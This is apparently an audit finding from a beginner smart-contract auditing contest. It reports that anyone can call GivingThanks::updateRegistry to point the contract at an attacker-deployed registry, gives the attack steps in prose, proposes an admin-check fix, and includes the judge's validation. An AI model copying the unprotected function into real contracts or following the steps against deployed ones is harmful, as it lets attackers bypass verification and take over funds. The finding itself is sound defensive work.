GivingThanks
First Flight #28
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Missing access control in `GivingThanks::updateRegistry` function

predator

Summary

Any user can call GivingThanks::updateRegistry and change the CharityRegistry address, as a result of missing access control

Vulnerability Details

  1. Original owner deploys CharityRegistry contract.

  2. Having CharityRegistry address, deploys GivingThanks contract.

  3. An attacker deploy ANOTHER CharityRegistry contract.

  4. An attacker could update the registry to a malicious contract using GivingThanks::updateRegistry.

  5. It gives opportunity to manipulate the contract’s behavior.

Impact

Anyone can call GivingThanks::updateRegistry function and change the CharityRegistry address, which can lead to a malicious entity redirecting the registry to their contract, compromising the entire system.

Tools Used

Manual, Remix IDE

Recommendations

To mitigate this issue, implement access control mechanisms, such as restricting this function to the contract owner or a privileged role. You can use the onlyOwner modifier from OpenZeppelin’s Ownable library to ensure only the owner can update the registry.

function updateRegistry(address _registry) public {
+ require(msg.sender == admin, "not admin");
registry = CharityRegistry(_registry);
}
Updates

Lead Judging Commences

n0kto Lead Judge 8 months ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-change-registry

Likelyhood: High, anyone can change it at anytime Impact: High, can bypass the verification process

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.